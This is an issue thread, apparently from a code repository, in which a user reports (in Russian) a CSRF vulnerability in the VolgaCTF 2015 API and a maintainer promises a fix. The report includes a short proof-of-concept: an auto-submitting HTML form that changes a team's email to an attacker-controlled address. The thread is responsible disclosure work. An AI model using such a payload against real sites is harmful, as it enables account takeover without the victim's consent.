API CSRF

Question

API CSRF

Closed this issue 10 years ago · 1 comments

api.2015.volgactf.ru уязвим к CSRF атакам.

Пример изменения email команды:

<form id="csrf" action="http://api.2015.volgactf.ru/team/change-email" method="POST">
  <input type="hidden" name="email" value="test@attacker.com" />
  <input type="submit" value="Submit request" />
</form>
<script>document.getElementById("csrf").submit()</script>

Answer 1 · 2015-04-06T08:47:04.000Z

Thanks for pointing out the problem! I will try to fix it soon.